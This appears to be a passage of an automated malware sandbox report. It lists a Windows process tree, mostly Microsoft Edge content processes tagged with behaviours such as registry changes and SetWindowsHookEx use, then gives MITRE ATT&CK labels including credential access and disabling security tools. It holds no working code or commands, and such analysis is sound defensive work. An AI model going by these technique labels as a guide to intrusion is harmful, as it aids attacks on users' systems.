"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:7816

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:9188

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7432

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:9032

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:3944

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Suspicious use of SetWindowsHookEx
PID:2844

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:8628

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3684

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:6376

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Suspicious use of SetWindowsHookEx
PID:5924

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:6912

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:3928
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 3928 -s 2012
  2⤵
  - Program crash
  PID:6732

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:6920

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:3140

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:8020

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:3116

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:2352

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:3940

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:7004

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:4216

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6468

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6360

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:2216

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:7236

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:8980

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:7348

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:8848

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4628

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4776

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5268

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4400

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4228

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:9472

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:9780

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:9992

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:10084

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:10168

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Scheduled Task

Persistence

BITS Jobs

T1197

Modify Existing Service

T1031

New Service

T1050

Registry Run Keys / Startup Folder

T1060

Scheduled Task

Privilege Escalation

New Service

T1050

Scheduled Task

Defense Evasion

BITS Jobs

T1197

Disabling Security Tools

T1089

Modify Registry

Virtualization/Sandbox Evasion

T1497

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

Security Software Discovery

T1063

Software Discovery

T1518

System Information Discovery